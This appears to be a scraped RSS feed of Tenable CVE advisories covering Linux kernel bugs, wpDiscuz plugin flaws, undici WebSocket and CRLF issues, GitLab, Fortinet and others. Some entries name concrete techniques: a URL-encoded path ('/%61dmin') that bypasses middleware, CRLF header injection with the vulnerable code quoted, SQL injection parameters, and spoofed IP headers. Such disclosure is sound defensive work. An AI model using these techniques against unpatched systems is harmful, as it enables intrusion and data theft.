In the Linux kernel, the following vulnerability has been resolved: net/sched: act_ife: avoid possible NULL deref tcf_ife_encode() must make sure ife_encode() does not return NULL. syzbot reported: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] RIP: 0010:ife_tlv_meta_encode+0x41/0xa0 net/ife/ife.c:166 CPU: 3 UID: 0 PID: 8990 Comm: syz.0.696 Not tainted syzkaller #0 PREEMPT(full) Call Trace: ife_encode_meta_u32+0x153/0x180 net/sched/act_ife.c:101 tcf_ife_encode net/sched/act_ife.c:841 [inline] tcf_ife_act+0x1022/0x1de0 net/sched/act_ife.c:877 tc_act include/net/tc_wrapper.h:130 [inline] tcf_action_exec+0x1c0/0xa20 net/sched/act_api.c:1152 tcf_exts_exec include/net/pkt_cls.h:349 [inline] mall_classify+0x1a0/0x2a0 net/sched/cls_matchall.c:42 tc_classify include/net/tc_wrapper.h:197 [inline] __tcf_classify net/sched/cls_api.c:1764 [inline] tcf_classify+0x7f2/0x1380 net/sched/cls_api.c:1860 multiq_classify net/sched/sch_multiq.c:39 [inline] multiq_enqueue+0xe0/0x510 net/sched/sch_multiq.c:66 dev_qdisc_enqueue+0x45/0x250 net/core/dev.c:4147 __dev_xmit_skb net/core/dev.c:4262 [inline] __dev_queue_xmit+0x2998/0x46c0 net/core/dev.c:4798

Read more at https://www.tenable.com/cve/CVE-2026-23064

]]> https://www.tenable.com/cve/CVE-2026-23063 https://www.tenable.com/cve/CVE-2026-23063 Wed, 04 Feb 2026 17:16:16 GMT Medium Severity

Description

In the Linux kernel, the following vulnerability has been resolved: uacce: ensure safe queue release with state management Directly calling `put_queue` carries risks since it cannot guarantee that resources of `uacce_queue` have been fully released beforehand. So adding a `stop_queue` operation for the UACCE_CMD_PUT_Q command and leaving the `put_queue` operation to the final resource release ensures safety. Queue states are defined as follows: - UACCE_Q_ZOMBIE: Initial state - UACCE_Q_INIT: After opening `uacce` - UACCE_Q_STARTED: After `start` is issued via `ioctl` When executing `poweroff -f` in virt while accelerator are still working, `uacce_fops_release` and `uacce_remove` may execute concurrently. This can cause `uacce_put_queue` within `uacce_fops_release` to access a NULL `ops` pointer. Therefore, add state checks to prevent accessing freed pointers.

Read more at https://www.tenable.com/cve/CVE-2026-23063

]]> https://www.tenable.com/cve/CVE-2026-23062 https://www.tenable.com/cve/CVE-2026-23062 Wed, 04 Feb 2026 17:16:16 GMT Medium Severity

Description

In the Linux kernel, the following vulnerability has been resolved: platform/x86: hp-bioscfg: Fix kernel panic in GET_INSTANCE_ID macro The GET_INSTANCE_ID macro that caused a kernel panic when accessing sysfs attributes: 1. Off-by-one error: The loop condition used '<=' instead of '<', causing access beyond array bounds. Since array indices are 0-based and go from 0 to instances_count-1, the loop should use '<'. 2. Missing NULL check: The code dereferenced attr_name_kobj->name without checking if attr_name_kobj was NULL, causing a null pointer dereference in min_length_show() and other attribute show functions. The panic occurred when fwupd tried to read BIOS configuration attributes: Oops: general protection fault [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] RIP: 0010:min_length_show+0xcf/0x1d0 [hp_bioscfg] Add a NULL check for attr_name_kobj before dereferencing and corrects the loop boundary to match the pattern used elsewhere in the driver.

Read more at https://www.tenable.com/cve/CVE-2026-23062

]]> https://www.tenable.com/cve/CVE-2026-23061 https://www.tenable.com/cve/CVE-2026-23061 Wed, 04 Feb 2026 17:16:16 GMT Medium Severity

Description

In the Linux kernel, the following vulnerability has been resolved: can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak Fix similar memory leak as in commit 7352e1d5932a ("can: gs_usb: gs_usb_receive_bulk_callback(): fix URB memory leak"). In kvaser_usb_set_{,data_}bittiming() -> kvaser_usb_setup_rx_urbs(), the URBs for USB-in transfers are allocated, added to the dev->rx_submitted anchor and submitted. In the complete callback kvaser_usb_read_bulk_callback(), the URBs are processed and resubmitted. In kvaser_usb_remove_interfaces() the URBs are freed by calling usb_kill_anchored_urbs(&dev->rx_submitted). However, this does not take into account that the USB framework unanchors the URB before the complete function is called. This means that once an in-URB has been completed, it is no longer anchored and is ultimately not released in usb_kill_anchored_urbs(). Fix the memory leak by anchoring the URB in the kvaser_usb_read_bulk_callback() to the dev->rx_submitted anchor.

Read more at https://www.tenable.com/cve/CVE-2026-23061

]]> https://www.tenable.com/cve/CVE-2026-23060 https://www.tenable.com/cve/CVE-2026-23060 Wed, 04 Feb 2026 17:16:16 GMT Medium Severity

Description

In the Linux kernel, the following vulnerability has been resolved: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec authencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than the minimum expected length, crypto_authenc_esn_decrypt() can advance past the end of the destination scatterlist and trigger a NULL pointer dereference in scatterwalk_map_and_copy(), leading to a kernel panic (DoS). Add a minimum AAD length check to fail fast on invalid inputs.

Read more at https://www.tenable.com/cve/CVE-2026-23060

]]> https://www.tenable.com/cve/CVE-2026-22866 https://www.tenable.com/cve/CVE-2026-22866 Wed, 25 Feb 2026 16:23:25 GMT Medium Severity

Description

Ethereum Name Service (ENS) is a distributed, open, and extensible naming system based on the Ethereum blockchain. In versions 1.6.2 and prior, the `RSASHA256Algorithm` and `RSASHA1Algorithm` contracts fail to validate PKCS#1 v1.5 padding structure when verifying RSA signatures. The contracts only check if the last 32 (or 20) bytes of the decrypted signature match the expected hash. This enables Bleichenbacher's 2006 signature forgery attack against DNS zones using RSA keys with low public exponents (e=3). Two ENS-supported TLDs (.cc and .name) use e=3 for their Key Signing Keys, allowing any domain under these TLDs to be fraudulently claimed on ENS without DNS ownership. Apatch was merged at commit c76c5ad0dc9de1c966443bd946fafc6351f87587. Possible workarounds include deploying the patched contracts and pointing DNSSECImpl.setAlgorithm to the deployed contract.

Read more at https://www.tenable.com/cve/CVE-2026-22866

]]> https://www.tenable.com/cve/CVE-2026-22629 https://www.tenable.com/cve/CVE-2026-22629 Tue, 10 Mar 2026 18:18:12 GMT Low Severity

Description

An improper restriction of excessive authentication attempts vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4 all versions, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer 6.4 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4 all versions, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiAnalyzer Cloud 6.4 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4 all versions, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager 6.4 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4 all versions, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions, FortiManager Cloud 6.4 all versions may allow an attacker to bypass bruteforce protections via exploitation of race conditions. The latter raises the complexity of practical exploitation.

Read more at https://www.tenable.com/cve/CVE-2026-22629

]]> https://www.tenable.com/cve/CVE-2026-22572 https://www.tenable.com/cve/CVE-2026-22572 Tue, 10 Mar 2026 18:18:12 GMT High Severity

Description

An authentication bypass using an alternate path or channel vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.3, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2.2 through 7.2.11, FortiManager 7.6.0 through 7.6.3, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2.2 through 7.2.11, FortiManager Cloud 7.6.0 through 7.6.3, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2.2 through 7.2.10 may allow an attacker with knowledge of the admins password to bypass multifactor authentication checks via submitting multiple crafted requests.

Read more at https://www.tenable.com/cve/CVE-2026-22572

]]> https://www.tenable.com/cve/CVE-2026-2257 https://www.tenable.com/cve/CVE-2026-2257 Fri, 13 Mar 2026 19:54:33 GMT Medium Severity

Description

The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2 due to missing validation on a user controlled key in the `action` function. This makes it possible for authenticated attackers, with Author-level access and above, to update post metadata for arbitrary posts. Combined with a lack of input sanitization, this leads to Stored Cross-Site Scripting when a higher-privileged user (such as an Administrator) views the affected post's "Competitor" tab in the GetGenie sidebar.

Read more at https://www.tenable.com/cve/CVE-2026-2257

]]> https://www.tenable.com/cve/CVE-2026-2229 https://www.tenable.com/cve/CVE-2026-2229 Thu, 12 Mar 2026 21:16:25 GMT High Severity

Description

ImpactThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the server_max_window_bits parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range server_max_window_bits value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination. The vulnerability exists because: * The isValidClientWindowBits() function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15 * The createInflateRaw() call is not wrapped in a try-catch block * The resulting exception propagates up through the call stack and crashes the Node.js process

Read more at https://www.tenable.com/cve/CVE-2026-2229

]]> https://www.tenable.com/cve/CVE-2026-22216 https://www.tenable.com/cve/CVE-2026-22216 Fri, 13 Mar 2026 19:54:11 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains a missing rate limiting vulnerability that allows unauthenticated attackers to subscribe arbitrary email addresses to post notifications by sending POST requests to the wpdAddSubscription handler in class.WpdiscuzHelperAjax.php. Attackers can exploit LIKE wildcard characters in the subscription query to match multiple email addresses and generate unwanted notification emails to victim accounts.

Read more at https://www.tenable.com/cve/CVE-2026-22216

]]> https://www.tenable.com/cve/CVE-2026-22215 https://www.tenable.com/cve/CVE-2026-22215 Fri, 13 Mar 2026 19:54:11 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains a cross-site request forgery vulnerability in the getFollowsPage() function that allows attackers to trigger unauthorized actions without nonce validation. Attackers can craft malicious requests to enumerate follow relationships and manipulate user follow data by exploiting the missing CSRF protection in the follows page handler.

Read more at https://www.tenable.com/cve/CVE-2026-22215

]]> https://www.tenable.com/cve/CVE-2026-22210 https://www.tenable.com/cve/CVE-2026-22210 Fri, 13 Mar 2026 19:54:11 GMT Low Severity

Description

wpDiscuz before 7.6.47 contains a cross-site scripting vulnerability that allows attackers to inject malicious code through unescaped attachment URLs in HTML output by exploiting the WpdiscuzHelperUpload class. Attackers can craft malicious attachment records or filter hooks to inject arbitrary JavaScript into img and anchor tag attributes, executing code in the context of WordPress users viewing comments.

Read more at https://www.tenable.com/cve/CVE-2026-22210

]]> https://www.tenable.com/cve/CVE-2026-22209 https://www.tenable.com/cve/CVE-2026-22209 Fri, 13 Mar 2026 19:54:11 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains a cross-site scripting vulnerability in the customCss field that allows administrators to inject malicious scripts by breaking out of style tags. Attackers with admin access can inject payloads like in the custom CSS setting to execute arbitrary JavaScript in user browsers.

Read more at https://www.tenable.com/cve/CVE-2026-22209

]]> https://www.tenable.com/cve/CVE-2026-22204 https://www.tenable.com/cve/CVE-2026-22204 Fri, 13 Mar 2026 19:54:10 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains an email header injection vulnerability that allows attackers to manipulate mail recipients by injecting malicious data into the comment_author_email cookie. Attackers can craft a malicious cookie value that, when processed through urldecode() and passed to wp_mail() functions, enables header injection to alter email recipients or inject additional headers.

Read more at https://www.tenable.com/cve/CVE-2026-22204

]]> https://www.tenable.com/cve/CVE-2026-22203 https://www.tenable.com/cve/CVE-2026-22203 Fri, 13 Mar 2026 19:54:10 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains an information disclosure vulnerability that allows administrators to inadvertently expose OAuth secrets by exporting plugin options as JSON. Attackers can obtain exported files containing plaintext API secrets like fbAppSecret, googleClientSecret, twitterAppSecret, and other social login credentials from support tickets, backups, or version control repositories.

Read more at https://www.tenable.com/cve/CVE-2026-22203

]]> https://www.tenable.com/cve/CVE-2026-22202 https://www.tenable.com/cve/CVE-2026-22202 Fri, 13 Mar 2026 19:54:10 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains a cross-site request forgery vulnerability that allows attackers to delete all comments associated with an email address by crafting a malicious GET request with a valid HMAC key. Attackers can embed the deletecomments action URL in image tags or other resources to trigger permanent deletion of comments without user confirmation or POST-based CSRF protection.

Read more at https://www.tenable.com/cve/CVE-2026-22202

]]> https://www.tenable.com/cve/CVE-2026-22201 https://www.tenable.com/cve/CVE-2026-22201 Fri, 13 Mar 2026 19:54:10 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains an IP spoofing vulnerability in the getIP() function that allows attackers to bypass IP-based rate limiting and ban enforcement by trusting untrusted HTTP headers. Attackers can set HTTP_CLIENT_IP or HTTP_X_FORWARDED_FOR headers to spoof their IP address and circumvent security controls.

Read more at https://www.tenable.com/cve/CVE-2026-22201

]]> https://www.tenable.com/cve/CVE-2026-22199 https://www.tenable.com/cve/CVE-2026-22199 Fri, 13 Mar 2026 19:54:09 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains a vote manipulation vulnerability that allows attackers to manipulate comment votes by obtaining fresh nonces and bypassing rate limiting through client-controlled headers. Attackers can vary User-Agent headers to reset rate limits, request nonces from the unauthenticated wpdGetNonce endpoint, and vote multiple times using IP rotation or reverse proxy header manipulation.

Read more at https://www.tenable.com/cve/CVE-2026-22199

]]> https://www.tenable.com/cve/CVE-2026-22193 https://www.tenable.com/cve/CVE-2026-22193 Fri, 13 Mar 2026 19:54:09 GMT Critical Severity

Description

wpDiscuz before 7.6.47 contains an SQL injection vulnerability in the getAllSubscriptions() function where string parameters lack proper quote escaping in SQL queries. Attackers can inject malicious SQL code through email, activation_key, subscription_date, and imported_from parameters to manipulate database queries and extract sensitive information.

Read more at https://www.tenable.com/cve/CVE-2026-22193

]]> https://www.tenable.com/cve/CVE-2026-22192 https://www.tenable.com/cve/CVE-2026-22192 Fri, 13 Mar 2026 19:54:09 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by importing a crafted options file with unescaped customCss field values. Attackers can supply a malicious JSON import file containing script payloads in the customCss parameter that execute on every page when rendered through the options handler without proper sanitization.

Read more at https://www.tenable.com/cve/CVE-2026-22192

]]> https://www.tenable.com/cve/CVE-2026-22191 https://www.tenable.com/cve/CVE-2026-22191 Fri, 13 Mar 2026 19:54:09 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains a shortcode injection vulnerability that allows attackers to execute arbitrary shortcodes by including them in comment content sent via email notifications. Attackers can inject shortcodes like [contact-form-7] or [user_meta] in comments, which are executed server-side when the WpdiscuzHelperEmail class processes notifications through do_shortcode() before wp_mail().

Read more at https://www.tenable.com/cve/CVE-2026-22191

]]> https://www.tenable.com/cve/CVE-2026-22183 https://www.tenable.com/cve/CVE-2026-22183 Fri, 13 Mar 2026 19:54:07 GMT Medium Severity

Description

wpDiscuz before 7.6.47 contains a stored cross-site scripting vulnerability in the inline comment preview functionality that allows authenticated users to inject malicious scripts by submitting comments with unescaped content. Attackers with unfiltered_html capabilities can inject JavaScript directly through comment content rendered in the AJAX response from the getLastInlineComments() function in class.WpdiscuzHelperAjax.php without proper HTML escaping.

Read more at https://www.tenable.com/cve/CVE-2026-22183

]]> https://www.tenable.com/cve/CVE-2026-22182 https://www.tenable.com/cve/CVE-2026-22182 Fri, 13 Mar 2026 19:54:07 GMT High Severity

Description

wpDiscuz before 7.6.47 contains an unauthenticated denial of service vulnerability that allows anonymous users to trigger mass notification emails by exploiting the checkNotificationType() function. Attackers can repeatedly call the wpdiscuz-ajax.php endpoint with arbitrary postId and comment_id parameters to flood subscribers with notifications, as the handler lacks nonce verification, authentication checks, and rate limiting.

Read more at https://www.tenable.com/cve/CVE-2026-22182

]]> https://www.tenable.com/cve/CVE-2026-22052 https://www.tenable.com/cve/CVE-2026-22052 Thu, 05 Mar 2026 00:15:56 GMT Medium Severity

Description

ONTAP versions 9.12.1 and higher with S3 NAS buckets are susceptible to an information disclosure vulnerability. Successful exploit could allow an authenticated attacker to view a listing of the contents in a directory for which they lack permission.

Read more at https://www.tenable.com/cve/CVE-2026-22052

]]> https://www.tenable.com/cve/CVE-2026-22031 https://www.tenable.com/cve/CVE-2026-22031 Mon, 19 Jan 2026 16:15:54 GMT High Severity

Description

@fastify/middie is the plugin that adds middleware support on steroids to Fastify. A security vulnerability exists in @fastify/middie prior to version 9.1.0 where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints. Version 9.1.0 fixes the issue.

Read more at https://www.tenable.com/cve/CVE-2026-22031

]]> https://www.tenable.com/cve/CVE-2026-21628 https://www.tenable.com/cve/CVE-2026-21628 Thu, 05 Mar 2026 10:15:57 GMT Critical Severity

Description

A improperly secured file management feature allows uploads of dangerous data types for unauthenticated users, leading to remote code execution.

Read more at https://www.tenable.com/cve/CVE-2026-21628

]]> https://www.tenable.com/cve/CVE-2026-21262 https://www.tenable.com/cve/CVE-2026-21262 Tue, 10 Mar 2026 18:18:06 GMT High Severity

Description

Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.

Read more at https://www.tenable.com/cve/CVE-2026-21262

]]> https://www.tenable.com/cve/CVE-2026-20967 https://www.tenable.com/cve/CVE-2026-20967 Tue, 10 Mar 2026 18:18:05 GMT High Severity

Description

Improper input validation in System Center Operations Manager allows an authorized attacker to elevate privileges over a network.

Read more at https://www.tenable.com/cve/CVE-2026-20967

]]> https://www.tenable.com/cve/CVE-2026-1732 https://www.tenable.com/cve/CVE-2026-1732 Wed, 11 Mar 2026 16:16:22 GMT Medium Severity

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.6 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user to disclose confidential issue titles due to improper filtering under certain circumstances.

Read more at https://www.tenable.com/cve/CVE-2026-1732

]]> https://www.tenable.com/cve/CVE-2026-1704 https://www.tenable.com/cve/CVE-2026-1704 Fri, 13 Mar 2026 19:53:58 GMT Medium Severity

Description

The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.9.29. This is due to the `get_item_permissions_check` method granting access to users with the `ssa_manage_appointments` capability without validating staff ownership of the requested appointment. This makes it possible for authenticated attackers, with custom-level access and above (users granted the ssa_manage_appointments capability, such as Team Members), to view appointment records belonging to other staff members and access sensitive customer personally identifiable information via the appointment ID parameter.

Read more at https://www.tenable.com/cve/CVE-2026-1704

]]> https://www.tenable.com/cve/CVE-2026-1668 https://www.tenable.com/cve/CVE-2026-1668 Fri, 13 Mar 2026 19:53:58 GMT High Severity

Description

The web interface on multiple Omada switches does not adequately validate certain external inputs, which may lead to out-of-bound memory access when processing crafted requests. Under specific conditions, this flaw may result in unintended command execution.
An unauthenticated attacker with network access to the affected interface may cause memory corruption, service instability, or information disclosure. Successful exploitation may allow remote code execution or denial-of-service.

Read more at https://www.tenable.com/cve/CVE-2026-1668

]]> https://www.tenable.com/cve/CVE-2026-1663 https://www.tenable.com/cve/CVE-2026-1663 Wed, 11 Mar 2026 16:16:22 GMT Medium Severity

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 14.4 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user with group import permissions to create labels in private projects due to improper authorization validation in the group import process under certain circumstances.

Read more at https://www.tenable.com/cve/CVE-2026-1663

]]> https://www.tenable.com/cve/CVE-2026-1528 https://www.tenable.com/cve/CVE-2026-1528 Thu, 12 Mar 2026 21:16:25 GMT High Severity

Description

ImpactA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. Patches Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.

Read more at https://www.tenable.com/cve/CVE-2026-1528

]]> https://www.tenable.com/cve/CVE-2026-1527 https://www.tenable.com/cve/CVE-2026-1527 Thu, 12 Mar 2026 21:16:25 GMT Medium Severity

Description

ImpactWhen an application passes user-controlled input to the upgrade option of client.request(), an attacker can inject CRLF sequences (\r\n) to: * Inject arbitrary HTTP headers * Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch) The vulnerability exists because undici writes the upgrade value directly to the socket without validating for invalid header characters: // lib/dispatcher/client-h1.js:1121 if (upgrade) { header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` }

Read more at https://www.tenable.com/cve/CVE-2026-1527

]]> https://www.tenable.com/cve/CVE-2026-1526 https://www.tenable.com/cve/CVE-2026-1526 Thu, 12 Mar 2026 21:16:23 GMT High Severity

Description

The undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a "decompression bomb") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive. The vulnerability exists in the PerMessageDeflate.decompress() method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.

Read more at https://www.tenable.com/cve/CVE-2026-1526

]]> https://www.tenable.com/cve/CVE-2026-1182 https://www.tenable.com/cve/CVE-2026-1182 Thu, 12 Mar 2026 02:15:58 GMT Medium Severity

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 8.14 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user to gain unauthorized access to confidential issue title created in public projects under certain circumstances.

Read more at https://www.tenable.com/cve/CVE-2026-1182

]]> https://www.tenable.com/cve/CVE-2026-1090 https://www.tenable.com/cve/CVE-2026-1090 Wed, 11 Mar 2026 16:16:22 GMT Medium Severity

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.6 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user, when the `markdown_placeholders` feature flag was enabled, to inject JavaScript in a browser due to improper sanitization of placeholder content in markdown processing.

Read more at https://www.tenable.com/cve/CVE-2026-1090

]]> https://www.tenable.com/cve/CVE-2026-1069 https://www.tenable.com/cve/CVE-2026-1069 Wed, 11 Mar 2026 16:16:22 GMT High Severity

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.9 before 18.9.2 that could have allowed an unauthenticated user to cause a denial of service by sending specially crafted GraphQL requests due to uncontrolled recursion under certain circumstances.

Read more at https://www.tenable.com/cve/CVE-2026-1069

]]> https://www.tenable.com/cve/CVE-2026-0957 https://www.tenable.com/cve/CVE-2026-0957 Fri, 13 Mar 2026 19:53:57 GMT High Severity

Description

There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted file in Digilent DASYLab. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted file. This vulnerability affects all versions of Digilent DASYLab.

Read more at https://www.tenable.com/cve/CVE-2026-0957

]]> https://www.tenable.com/cve/CVE-2026-0956 https://www.tenable.com/cve/CVE-2026-0956 Fri, 13 Mar 2026 19:53:57 GMT High Severity

Description

There is a memory corruption vulnerability due to an out-of-bounds read when loading a corrupted file in Digilent DASYLab. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted file. This vulnerability affects all versions of Digilent DASYLab.

Read more at https://www.tenable.com/cve/CVE-2026-0956

]]> https://www.tenable.com/cve/CVE-2026-0955 https://www.tenable.com/cve/CVE-2026-0955 Fri, 13 Mar 2026 19:53:57 GMT High Severity

Description

There is a memory corruption vulnerability due to an out-of-bounds read when loading a corrupted file in Digilent DASYLab. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted file. This vulnerability affects all versions of Digilent DASYLab.

Read more at https://www.tenable.com/cve/CVE-2026-0955

]]> https://www.tenable.com/cve/CVE-2026-0954 https://www.tenable.com/cve/CVE-2026-0954 Fri, 13 Mar 2026 19:53:57 GMT High Severity

Description

There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted DSB file in Digilent DASYLab. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file. This vulnerability affects all versions of Digilent DASYLab.

Read more at https://www.tenable.com/cve/CVE-2026-0954

]]> https://www.tenable.com/cve/CVE-2026-0835 https://www.tenable.com/cve/CVE-2026-0835 Fri, 13 Mar 2026 19:53:56 GMT Medium Severity

Description

IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.1.0.0 through 6.1.2.7_2, 6.2.0.0 through 6.2.0.5_1, 6.2.1.0 through 6.2.1.1_1, and 6.2.2.0 are vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

Read more at https://www.tenable.com/cve/CVE-2026-0835

]]> https://www.tenable.com/cve/CVE-2026-0653 https://www.tenable.com/cve/CVE-2026-0653 Tue, 10 Feb 2026 18:16:22 GMT High Severity

Description

On TP-Link Tapo C260 v1 and D235 v1, a guest‑level authenticated user can bypass intended access restrictions by sending crafted requests to a synchronization endpoint. This allows modification of protected device settings despite limited privileges. An attacker may change sensitive configuration parameters without authorization, resulting in unauthorized device state manipulation but not full code execution.

Read more at https://www.tenable.com/cve/CVE-2026-0653

]]> https://www.tenable.com/cve/CVE-2026-0651 https://www.tenable.com/cve/CVE-2026-0651 Tue, 10 Feb 2026 18:16:21 GMT Medium Severity

Description

On TP-Link Tapo C260 v1 and D235 v1, path traversal is possible due to improper handling of specific GET request paths via https, allowing local unauthenticated probing of filesystem paths. An attacker on the local network can determine whether certain files exists on the device, with no read, write or code execution possibilities.

Read more at https://www.tenable.com/cve/CVE-2026-0651

]]> https://www.tenable.com/cve/CVE-2025-8766 https://www.tenable.com/cve/CVE-2025-8766 Fri, 13 Mar 2026 19:53:56 GMT Medium Severity

Description

A container privilege escalation flaw was found in certain Multi-Cloud Object Gateway Core images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container

Read more at https://www.tenable.com/cve/CVE-2025-8766

]]> https://www.tenable.com/cve/CVE-2025-71263 https://www.tenable.com/cve/CVE-2025-71263 Fri, 13 Mar 2026 19:53:53 GMT High Severity

Description

In UNIX Fourth Research Edition (v4), the su command is vulnerable to a buffer overflow due to the 'password' variable having a fixed size of 100 bytes. A local user can exploit this to gain root privileges. It is unlikely that UNIX v4 is running anywhere outside of a very small number of lab environments.

Read more at https://www.tenable.com/cve/CVE-2025-71263

]]> https://www.tenable.com/cve/CVE-2025-70245 https://www.tenable.com/cve/CVE-2025-70245 Thu, 12 Mar 2026 19:16:15 GMT Critical Severity

Description

Stack buffer overflow vulnerability in D-Link DIR-513 v1.10 via the curTime parameter to goform/formSetWizardSelectMode.

Read more at https://www.tenable.com/cve/CVE-2025-70245

]]> https://www.tenable.com/cve/CVE-2025-70060 https://www.tenable.com/cve/CVE-2025-70060 Mon, 09 Mar 2026 16:16:16 GMT Medium Severity

Description

An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in YMFE yapi v1.12.0.

Read more at https://www.tenable.com/cve/CVE-2025-70060

]]> https://www.tenable.com/cve/CVE-2025-70059 https://www.tenable.com/cve/CVE-2025-70059 Mon, 09 Mar 2026 15:15:52 GMT High Severity

Description

An issue pertaining to CWE-400: Uncontrolled Resource Consumption was discovered in YMFE yapi v1.12.0 and allows attackers to cause a denial of service.

Read more at https://www.tenable.com/cve/CVE-2025-70059

]]> https://www.tenable.com/cve/CVE-2025-70050 https://www.tenable.com/cve/CVE-2025-70050 Mon, 09 Mar 2026 16:16:15 GMT Medium Severity

Description

An issue pertaining to CWE-312: Cleartext Storage of Sensitive Information was discovered in lesspass lesspass v9.6.9 which allows attackers to obtain sensitive information.

Read more at https://www.tenable.com/cve/CVE-2025-70050

]]> https://www.tenable.com/cve/CVE-2025-70048 https://www.tenable.com/cve/CVE-2025-70048 Mon, 09 Mar 2026 16:16:15 GMT High Severity

Description

An issue pertaining to CWE-319: Cleartext Transmission of Sensitive Information was discovered in Nexusoft NexusInterface v3.2.0-beta.2.

Read more at https://www.tenable.com/cve/CVE-2025-70048

]]> https://www.tenable.com/cve/CVE-2025-70047 https://www.tenable.com/cve/CVE-2025-70047 Mon, 09 Mar 2026 16:16:15 GMT High Severity

Description

An issue pertaining to CWE-400: Uncontrolled Resource Consumption was discovered in Nexusoft NexusInterface v3.2.0-beta.2.

Read more at https://www.tenable.com/cve/CVE-2025-70047

]]> https://www.tenable.com/cve/CVE-2025-70046 https://www.tenable.com/cve/CVE-2025-70046 Mon, 09 Mar 2026 16:16:15 GMT Critical Severity

Description

An issue pertaining to CWE-829: Inclusion of Functionality from Untrusted Control Sphere was discovered in Miazzy oa-front-service master.

Read more at https://www.tenable.com/cve/CVE-2025-70046

]]>